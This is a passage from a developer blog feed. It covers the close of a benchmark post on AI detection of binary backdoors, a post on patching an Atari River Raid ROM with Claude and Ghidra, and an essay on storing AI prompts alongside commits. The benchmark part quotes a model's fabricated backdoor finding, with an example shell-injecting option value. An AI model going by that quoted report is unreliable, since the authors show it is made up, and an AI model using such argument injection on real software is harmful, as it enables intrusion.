Furthermore, the function &lt;code&gt;fcn.0002b260&lt;/code&gt; reads the string from offset &lt;code&gt;0x138&lt;/code&gt;, appends ” ini” to it, and executes it using &lt;code&gt;popen&lt;/code&gt;. The output is then parsed for a “duid”.&lt;br&gt;
This behavior allows an attacker to execute arbitrary commands by passing them as the argument to the &lt;code&gt;--max-cache-ttl&lt;/code&gt; option (e.g., &lt;code&gt;--max-cache-ttl=/bin/sh&lt;/code&gt;). This is a clear backdoor disguised as a legitimate configuration option.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;In reality, the source code correctly validates and parses the command-line argument as a number; it never attempts to execute it. Several “findings” the model reported are completely fabricated and do not exist in the source code.&lt;/p&gt;

&lt;h3&gt;
  
  
  The gap in open-source tooling
&lt;/h3&gt;

&lt;p&gt;We restricted agents to open-source tools: &lt;a href="https://github.com/NationalSecurityAgency/ghidra" rel="noopener noreferrer"&gt;Ghidra&lt;/a&gt; and &lt;a href="https://rada.re/" rel="noopener noreferrer"&gt;Radare2&lt;/a&gt;. We verified that frontier models (including Claude Opus 4.6 and Gemini 3 Pro) achieve a 100% success rate at &lt;a href="https://quesma.com/benchmarks/binaryaudit/tasks/ghidra-decompile-pyghidra/" rel="noopener noreferrer"&gt;operating them&lt;/a&gt; — correctly loading binaries and running basic commands.&lt;/p&gt;

&lt;p&gt;However, these open-source decompilers lag behind commercial alternatives like &lt;a href="https://hex-rays.com/ida-pro" rel="noopener noreferrer"&gt;IDA Pro&lt;/a&gt;. While they handle C binaries well, they have issues with Rust (though agents managed to solve some tasks), and fail completely with Go executables.&lt;/p&gt;

&lt;p&gt;For example, we tried to work with &lt;a href="https://github.com/caddyserver/caddy" rel="noopener noreferrer"&gt;Caddy&lt;/a&gt;, a web server written in Go, with a 50 MB binary. Radare2 loaded it in 6 minutes but produced poor-quality code, while Ghidra not only took 40 minutes just to load it, but also failed to return correct data. IDA Pro, by contrast, loaded it in 5 minutes and produced correct, usable code, sufficient for manual analysis.&lt;/p&gt;

&lt;p&gt;To ensure we measure agent intelligence rather than tool quality, we excluded Go binaries and focused mostly on C executables (and one Rust project) where the tooling is reliable.&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Results
&lt;/h3&gt;

&lt;p&gt;Can AI find backdoors in binaries? Sometimes. &lt;a href="https://quesma.com/benchmarks/binaryaudit/models/claude-opus-4.6/" rel="noopener noreferrer"&gt;Claude Opus 4.6&lt;/a&gt; solved 49% of tasks, while &lt;a href="https://quesma.com/benchmarks/binaryaudit/models/gemini-3-pro-preview/" rel="noopener noreferrer"&gt;Gemini 3 Pro&lt;/a&gt; solved 44% and &lt;a href="https://quesma.com/benchmarks/binaryaudit/models/claude-opus-4.5/" rel="noopener noreferrer"&gt;Claude Opus 4.5&lt;/a&gt; solved 37%.&lt;/p&gt;

&lt;p&gt;As of now, it is far from being useful in practice — we would need a much higher detection rate and a much lower false positive rate to make it a viable end-to-end solution.&lt;/p&gt;

&lt;p&gt;It works on small binaries and when it sees unexpected patterns. At the same time, it struggles with larger files or when backdoors mimic legitimate access routes.&lt;/p&gt;

&lt;h3&gt;
  
  
  Binary analysis is no longer just for experts
&lt;/h3&gt;

&lt;p&gt;While end-to-end malware detection is not reliable yet, AI can make it easier for developers to perform initial security audits. A developer without reverse engineering experience can now get a first-pass analysis of a suspicious binary.&lt;/p&gt;

&lt;p&gt;A year ago, models couldn’t reliably operate Ghidra. Now they can perform genuine reverse engineering — loading binaries, navigating decompiled code, tracing data flow.&lt;/p&gt;

&lt;p&gt;The whole field of working with binaries becomes accessible to a much wider range of software engineers. It opens opportunities not only in security, but also in performing low-level optimization, debugging and reverse engineering hardware, and porting code between architectures.&lt;/p&gt;

&lt;h3&gt;
  
  
  Future
&lt;/h3&gt;

&lt;p&gt;We believe that results can be further improved with context engineering (including proper skills or MCP) and access to commercial reverse engineering software (such as the mentioned IDA Pro and Binary Ninja).&lt;/p&gt;

&lt;p&gt;Once AI demonstrates the capability to solve some tasks (as it does now), subsequent models usually improve drastically.&lt;/p&gt;

&lt;p&gt;Moreover, we expect that a lot of analysis will be performed with local models, likely fine-tuned for malware detection. Security-sensitive organizations can’t upload proprietary binaries to cloud services. Additionally, bad actors will optimize their malware to evade public models, necessitating the use of private, local models for effective defense.&lt;/p&gt;

&lt;p&gt;You can check &lt;a href="https://quesma.com/benchmarks/binaryaudit/" rel="noopener noreferrer"&gt;the full results&lt;/a&gt; and see the tasks at &lt;a href="https://github.com/QuesmaOrg/BinaryAudit" rel="noopener noreferrer"&gt;QuesmaOrg/BinaryAudit&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>benchmark</category>
      <category>security</category>
    </item>
    <item>
      <title>Reverse engineering River Raid with Claude, Ghidra, and MCP</title>
      <dc:creator>Team Quesma</dc:creator>
      <pubDate>Thu, 29 Jan 2026 09:15:09 +0000</pubDate>
      <link>https://dev.to/teamquesma/reverse-engineering-river-raid-with-claude-ghidra-and-mcp-3oio</link>
      <guid>https://dev.to/teamquesma/reverse-engineering-river-raid-with-claude-ghidra-and-mcp-3oio</guid>
      <description>&lt;p&gt;&lt;em&gt;This blog post was authored by &lt;a href="https://www.linkedin.com/in/nablaone/" rel="noopener noreferrer"&gt;Rafal Strzalinski&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Can an AI agent navigate Ghidra, the NSA’s open-source reverse engineering suite, well enough to hack an Atari game? &lt;a href="https://github.com/NationalSecurityAgency/ghidra" rel="noopener noreferrer"&gt;Ghidra&lt;/a&gt; is powerful but notoriously complex, with a steep learning curve. Instead of spending weeks learning its interface, what if I could simply describe my goal and let an AI handle the complexity?&lt;/p&gt;

&lt;h2&gt;
  
  
  Childhood dream
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://en.wikipedia.org/wiki/River_Raid" rel="noopener noreferrer"&gt;River Raid&lt;/a&gt;, the Atari 8-bit version. My first computer was an Atari back in the 80s, and this particular game occupied a disproportionate amount of my childhood attention.&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/zYLA_uO-XH0?start=5"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;The ROM is exactly 8kB — almost comical by modern standards. And yet this tiny binary contains everything: graphics, sound, enemy AI, and physics simulation — all compressed into hand-optimized 6502 assembly.&lt;/p&gt;

&lt;p&gt;The objective was straightforward: unlimited lives. It’s the quintessential hack, a rite of passage that kids with hex editors performed for entertainment back in the 80s. In 2025, instead of a hex editor, I have an AI.&lt;/p&gt;

&lt;h2&gt;
  
  
  Setup
&lt;/h2&gt;

&lt;p&gt;Ghidra doesn’t have a native AI assistant, so I needed a way to bridge the gap between my instructions and the tool’s internal API. This is where the Model Context Protocol (MCP) comes in.&lt;/p&gt;

&lt;p&gt;I found an open-source &lt;a href="https://github.com/LaurieWired/GhidraMCP" rel="noopener noreferrer"&gt;MCP server for Ghidra&lt;/a&gt; — essentially a connector that allows Claude to talk directly to Ghidra. The concept is elegant: Claude connects to the running Ghidra instance, analyzes the binary, renames functions, and identifies code patterns programmatically.&lt;/p&gt;

&lt;p&gt;In practice, the experience was considerably less elegant:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;MCP has no standard distribution format (e.g., Docker, npm) — you git clone and hope for the best.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The resulting chain is: Claude → MCP server → Ghidra extension → Ghidra. Four components, four places where things can break.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  AI meets 6502
&lt;/h2&gt;

&lt;p&gt;Here’s the thing: I don’t use disassemblers daily. Ghidra’s workflow was completely foreign to me. The whole point was to see if AI could bridge that gap — I’d feed it a mysterious binary, and the Ghidra + LLM combination would figure out it’s a cartridge dump, handle the memory mapping, and guide me through.&lt;/p&gt;

&lt;p&gt;Reality was harsher. To test the AI properly, I renamed the binary to &lt;code&gt;a.rom&lt;/code&gt; — no helpful filename hints. When importing, I selected only the CPU architecture (6502) without specifying the platform. Claude’s first instinct was reasonable: it asked for the MD5 hash to search for known ROM signatures. The MCP tools don’t expose hashing, so that avenue closed immediately.&lt;/p&gt;

&lt;p&gt;First problem: Ghidra loaded the ROM at &lt;code&gt;$0000&lt;/code&gt;, not &lt;code&gt;$A000&lt;/code&gt; where Atari cartridges live. All cross-references pointed nowhere.&lt;/p&gt;

&lt;p&gt;Claude identified the issue with admirable clarity: “The ROM should be loaded at &lt;code&gt;$A000&lt;/code&gt;, not &lt;code&gt;$0000&lt;/code&gt;. You’ll need to rebase the memory image.”&lt;/p&gt;

&lt;p&gt;Me: “Can you perform the rebase?”&lt;/p&gt;

&lt;p&gt;Claude: “Unfortunately, no. The MCP tools don’t have write access for that particular operation.”&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F04nk93qp9j7rvn7ca119.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F04nk93qp9j7rvn7ca119.webp" alt=" "&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I rebased manually to &lt;code&gt;$8000&lt;/code&gt; — still wrong. The code referenced &lt;code&gt;$A000-$BFFF&lt;/code&gt;. Rebased again.&lt;/p&gt;

&lt;p&gt;Two rebasing operations in total, neither of which the AI could perform.&lt;/p&gt;

&lt;p&gt;Where Claude genuinely excelled was in identifying the target platform through hardware register analysis:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu8dfgjs9q0pt1ioacai1.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu8dfgjs9q0pt1ioacai1.webp" alt=" "&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Hardware addresses are essentially fingerprints that can’t be faked, and these particular addresses are unmistakably Atari 8-bit.&lt;/p&gt;

&lt;p&gt;I asked Claude to attempt identification of the game based purely on code patterns and structural analysis. It examined the evidence methodically. Based on this evidence, Claude reached its conclusion:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0t4oa4py0cvdacmhe8gp.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0t4oa4py0cvdacmhe8gp.webp" alt=" "&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It was, of course, not &lt;a href="https://en.wikipedia.org/wiki/Centipede_%28video_game%29" rel="noopener noreferrer"&gt;Centipede&lt;/a&gt;. It was River Raid.&lt;/p&gt;

&lt;p&gt;This serves as a useful reminder that confidence and accuracy are orthogonal properties.&lt;/p&gt;

&lt;h2&gt;
  
  
  The hack
&lt;/h2&gt;

&lt;p&gt;Despite the identity crisis, Claude still understood the code structure. Finding the lives decrement was straightforward. Claude searched for the canonical pattern: load, decrement, store.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzo6syef6spr0lgxcn8hj.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzo6syef6spr0lgxcn8hj.webp" alt=" "&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The fix is elegantly simple: replace &lt;code&gt;DEY&lt;/code&gt; (decrement Y register) with &lt;code&gt;NOP&lt;/code&gt; (no operation). A single-byte modification: &lt;code&gt;$88&lt;/code&gt; becomes &lt;code&gt;$EA&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Since the MCP tool couldn’t write the binary directly, I applied the patch externally:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;printf '\xEA' | dd of=riverraid.bin bs=1 seek=$((0x355)) conv=notrunc
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
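A quick way to sanity-check that the patch landed is to read the byte back. Here is a minimal Python sketch; the `0x355` offset and the `$88`/`$EA` opcodes come from the dd command above and assume this same ROM dump:

```python
# Check the one-byte patch: DEY ($88) should have become NOP ($EA)
# at offset 0x355. Offset and opcodes assume this particular ROM dump.
def patch_status(path, offset=0x355, original=0x88, patched=0xEA):
    with open(path, "rb") as f:
        data = f.read()
    byte = data[offset]
    if byte == patched:
        return "patched"
    if byte == original:
        return "original"
    return "unexpected: 0x%02X" % byte
```

Running `patch_status("riverraid.bin")` before and after the dd invocation should flip the result from `original` to `patched`.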



&lt;p&gt;I tested the patched ROM in an emulator by deliberately crashing into a bridge. The lives counter remained stubbornly fixed at 3.&lt;/p&gt;

&lt;p&gt;The hack works as intended.&lt;/p&gt;

&lt;h2&gt;
  
  
  What worked, what didn’t
&lt;/h2&gt;

&lt;p&gt;Claude excelled at pattern recognition — hardware registers, code flow, finding the patch location. It struggled with tasks requiring broader context, such as identifying the game or analyzing sprite data.&lt;/p&gt;

&lt;p&gt;Setting up MCP is a troubleshooting ritual. It eventually worked, but the experience was painfully slow. Claude would fire off a batch of tool calls, some taking 30 seconds each. Too slow for an interactive session — I’d rather have quick responses with clarifying questions than watch a progress bar crawl. We need a better balance between autonomous batch processing and interactive guidance.&lt;/p&gt;

&lt;p&gt;AI should be embedded in every complex GUI tool. We’re in the experimental phase now. Some things work, some don’t. Ideally AI should smooth out the experience in ways traditional help systems never could — compacted Stack Overflow knowledge, real context-aware assistance, and the ability to actually perform tasks rather than just describe them.&lt;/p&gt;

</description>
      <category>claude</category>
      <category>ai</category>
      <category>ghidra</category>
      <category>mcp</category>
    </item>
    <item>
      <title>Vibe coding needs git blame</title>
      <dc:creator>Team Quesma</dc:creator>
      <pubDate>Mon, 26 Jan 2026 09:17:45 +0000</pubDate>
      <link>https://dev.to/teamquesma/vibe-coding-needs-git-blame-431m</link>
      <guid>https://dev.to/teamquesma/vibe-coding-needs-git-blame-431m</guid>
      <description>&lt;p&gt;If you write a program in English and AI translates it into Python, which one is the actual source code?&lt;/p&gt;

&lt;p&gt;In the age of vibe coding[&lt;a href="https://dev.to/teamquesma/vibe-coding-needs-git-blame-431m/#footnotes"&gt;1&lt;/a&gt;], prompts are becoming the human interface. This raises a new dilemma: should we store these prompts alongside the code they generate, or discard them as transient artifacts?&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe15mziri2lipl06ij2co.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe15mziri2lipl06ij2co.webp" alt="The community is divided. When [Gergely Orosz polled developers](https://x.com/GergelyOrosz/status/2001632705050742975) about making prompts visible to code reviewers, opinions split: 49% loved it, while 24% hated the idea. Meanwhile, the industry is betting on a fundamental shift: [Cursor acquiring Graphite](https://techcrunch.com/2025/12/19/cursor-continues-acquisition-spree-with-graphite-deal/), a startup that uses AI to review and debug code, and [Meta creating internal tooling to publish prompts](https://newsletter.pragmaticengineer.com/i/182006906/internal-dev-tooling-at-meta-and-trajectories)." width="800" height="505"&gt;&lt;/a&gt;The community is divided. When &lt;a href="https://x.com/GergelyOrosz/status/2001632705050742975" rel="noopener noreferrer"&gt;Gergely Orosz polled developers &lt;/a&gt;about making prompts visible to code reviewers, opinions split: 49% loved it, while 24% hated the idea. Meanwhile, the industry is betting on a fundamental shift: &lt;a href="https://techcrunch.com/2025/12/19/cursor-continues-acquisition-spree-with-graphite-deal/" rel="noopener noreferrer"&gt;Cursor acquiring Graphite&lt;/a&gt;, a startup that uses AI to review and debug code, and &lt;a href="https://newsletter.pragmaticengineer.com/i/182006906/internal-dev-tooling-at-meta-and-trajectories" rel="noopener noreferrer"&gt;Meta creating internal tooling to publish prompts&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;We are still figuring out the norms for this new reality.&lt;/p&gt;

&lt;h2&gt;
  
  
  Are prompts the new source code?
&lt;/h2&gt;

&lt;p&gt;Traditionally, source code is what humans write, and machine code is what computers execute.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw4f591oq5r599wjx6mu6.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw4f591oq5r599wjx6mu6.webp" alt=" " width="800" height="119"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For the end user, the build is all that matters. They download binaries or open the website. They don’t care about the code, nor should they. Yet source code is what is needed for development — and sufficient to generate builds.&lt;/p&gt;

&lt;p&gt;With vibe coding, we translate natural language into programming language:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpxukzu48xuyhlqm6vhik.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpxukzu48xuyhlqm6vhik.webp" alt=" " width="800" height="119"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If prompts are the real “source”, should we be committing them instead of the Python, TypeScript, or Rust they generate? It might be tempting to cut out the middleman and treat our instructions as source code. But it does not work that way.&lt;/p&gt;

&lt;p&gt;Building code is deterministic, or close to it. Code that compiles only during a full moon is not good code. In 2026 we are well past the era of “works on my machine” and should never go back there.&lt;/p&gt;

&lt;p&gt;Good repositories have a clear, documented way to build and run, so there is no guesswork about which commands to run or which package versions to use. In most modern languages, the toolsets are good — both package managers and other tooling such as Dockerfiles, GitHub Actions, or similar.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbvy3d04kq0l80d47tbr7.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbvy3d04kq0l80d47tbr7.webp" alt=" " width="800" height="148"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;At the same time, generating code from prompts is non-deterministic by nature, and hard to replicate.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Probabilistic nature&lt;/strong&gt;: We can try to set &lt;code&gt;temperature=0&lt;/code&gt;, but it is neither supported by all APIs nor guaranteed to produce the best result (see this beautiful &lt;a href="https://poloclub.github.io/transformer-explainer/" rel="noopener noreferrer"&gt;Transformer Explainer&lt;/a&gt;). &lt;a href="https://thinkingmachines.ai/blog/defeating-nondeterminism-in-llm-inference/" rel="noopener noreferrer"&gt;Guaranteeing determinism is a research problem&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Lack of long-term support&lt;/strong&gt;: Models update silently or are deprecated. Unlike pinned package versions, we cannot rely on a specific model snapshot existing forever.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Hard to capture context&lt;/strong&gt;: LLMs work best with rich context beyond the prompt itself, including conversation history, memory, skills, screenshots, tool outputs, and MCP servers.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
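On the first point: temperature rescales the logits before softmax, and as it approaches zero, sampling collapses to a plain argmax, which is why `temperature=0` reduces (but, per the linked research, does not guarantee) determinism. A minimal, self-contained sketch of the mechanism:

```python
import math
import random

def sample_token(logits, temperature=1.0, rng=random):
    """Sample an index from logits; temperature -> 0 collapses to argmax."""
    if temperature <= 1e-6:
        # Greedy decoding: always pick the highest-logit token.
        return max(range(len(logits)), key=lambda i: logits[i])
    scaled = [l / temperature for l in logits]
    m = max(scaled)  # subtract max for numerical stability
    exps = [math.exp(s - m) for s in scaled]
    total = sum(exps)
    # Inverse-CDF sampling over the softmax distribution.
    r = rng.random()
    acc = 0.0
    for i, e in enumerate(exps):
        acc += e / total
        if r < acc:
            return i
    return len(logits) - 1
```

Even this toy version hints at the problem: at any nonzero temperature the output depends on the random draw, and in real inference stacks floating-point reduction order adds further nondeterminism on top.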

&lt;p&gt;Even in the simplest case, results differ.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgeqlas8v3zaidio0trag.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgeqlas8v3zaidio0trag.png" alt="Same prompt (“Create an HTML file with a cute, interactive octopus.”), same agent (Claude Code), same model (Opus 4.5), still — slightly different results." width="767" height="256"&gt;&lt;/a&gt;Same prompt (“Create an HTML file with a cute, interactive octopus.”), same agent (Claude Code), same model (Opus 4.5), still — slightly different results.&lt;/p&gt;

&lt;p&gt;In larger projects, the same prompt might solve an issue once, fail another time, and introduce a new bug.&lt;/p&gt;

&lt;p&gt;Even something as explicit as “correct grammar” of a single blog post yields different outcomes.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnhuuenrxmq7o0z2d0jtx.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnhuuenrxmq7o0z2d0jtx.webp" alt="I ran four instances of Gemini 3 Pro in parallel in Cursor, with the same prompt — “Correct grammar in this post”. Even for standard tasks, each worked differently and gave different results." width="800" height="284"&gt;&lt;/a&gt;I ran four instances of Gemini 3 Pro in parallel in Cursor, with the same prompt — “Correct grammar in this post”. Even for standard tasks, each worked differently and gave different results.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where is the room for prompts?
&lt;/h2&gt;

&lt;p&gt;Prompts are a kind of spec. They can be very vague, leaving a lot of room for interpretation.&lt;/p&gt;

&lt;p&gt;Natural language does not compile — which is both a feature and a curse.&lt;/p&gt;

&lt;p&gt;Even when they are precise, there is still space left[&lt;a href="https://dev.to/teamquesma/vibe-coding-needs-git-blame-431m/#footnotes"&gt;2&lt;/a&gt;]. Just because we gave a clear specification and asked someone (or something) to do it, doesn’t mean it works yet. Current LLMs are far from perfect. Sometimes they fail instructions that would be clear to an employee.&lt;/p&gt;

&lt;p&gt;That’s why prompts are best treated as intentions and notes from the development process — useful context, not a reliable build input.&lt;/p&gt;

&lt;h3&gt;
  
  
  We should be able to (git) blame AI
&lt;/h3&gt;

&lt;p&gt;I think that all contributions from AI should be attributed as such (both code changes and commits). Not because they are worse (or better), but as an essential troubleshooting tool. More and more open source projects require clear disclosure on AI contributions[&lt;a href="https://dev.to/teamquesma/vibe-coding-needs-git-blame-431m/#footnotes"&gt;3&lt;/a&gt;].&lt;/p&gt;

&lt;p&gt;Among other things, it is crucial to know: what was intended, what was a conscious decision, and what just “happened”.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58g2gmz7gibv7iy5tyet.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58g2gmz7gibv7iy5tyet.webp" alt="From [stared/sc2-balance-timeline](https://github.com/stared/sc2-balance-timeline), my entirely vibe-coded side project [15 Years of StarCraft II Balance Changes Visualized](https://p.migdal.pl/sc2-balance-timeline/). Each commit is also Claude-generated, so I can compare package changes with their intention." width="800" height="271"&gt;&lt;/a&gt;From &lt;a href="https://github.com/stared/sc2-balance-timeline" rel="noopener noreferrer"&gt;stared/sc2-balance-timeline&lt;/a&gt;, my entirely vibe-coded side project &lt;a href="https://p.migdal.pl/sc2-balance-timeline/" rel="noopener noreferrer"&gt;15 Years of StarCraft II Balance Changes Visualized&lt;/a&gt;. Each commit is also Claude-generated, so I can compare package changes with their intention.&lt;/p&gt;

&lt;p&gt;Tracking prompts helps us on a few levels:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Learning&lt;/strong&gt;: The AI world is moving so fast it is hard to catch up. Learning from peers is super valuable — even Andrej Karpathy mentioned &lt;a href="https://x.com/karpathy/status/1761461671913160759" rel="noopener noreferrer"&gt;he feels behind&lt;/a&gt;. Seeing how others prompt models helps us improve our own workflows.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Intent verification&lt;/strong&gt;: We can understand the intention behind a change by reading the prompt.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Efficient reviewing&lt;/strong&gt;: AI makes it easy to create a commit, but reviewing it may take more time. Knowing code is AI-generated signals where to look closer. For example, UI code can be AI-generated, while we want human precision in auth logic.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Reservations
&lt;/h2&gt;

&lt;p&gt;One of the issues with saving prompts is the human factor. Tracking prompts is awkward due to creative flow, privacy, anger, and messiness:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Dirty notebook&lt;/strong&gt;: People often write prompts as a stream of consciousness, full of typos and idiosyncrasies.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Privacy&lt;/strong&gt;: Prompts might contain passwords, API keys, or personal data we don’t want to share publicly.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Profanity&lt;/strong&gt;: People behave less civilly towards AI than they would towards coworkers. Sometimes out of frustration, other times because it might actually work (see the &lt;a href="https://simonwillison.net/2025/Feb/25/leaked-windsurf-prompt/" rel="noopener noreferrer"&gt;famous leaked Windsurf prompt&lt;/a&gt;).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sense of pride&lt;/strong&gt;: For many, coding is a craft that demonstrates high-value skills. Using an LLM can make the output feel less “earned”.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Peer pressure&lt;/strong&gt;: There is a huge amount of “AI Slop” and valid skepticism. Many communities or reviewers automatically reject AI-assisted submissions.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We need redaction capabilities. Just as we squash dirty commits before pushing to a public repository, we should be able to curate our prompts.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Code reviews are evolving, and controversy is inevitable.&lt;/p&gt;

&lt;p&gt;We already have standards like &lt;code&gt;MCP&lt;/code&gt; and &lt;code&gt;SKILL.md&lt;/code&gt; — and we need one to share prompts alongside git commits. We are building an open-source tool to help with this — stay tuned!&lt;/p&gt;

&lt;p&gt;In the meantime, start simple: if you use AI to write code, use AI to write the commit message.&lt;/p&gt;

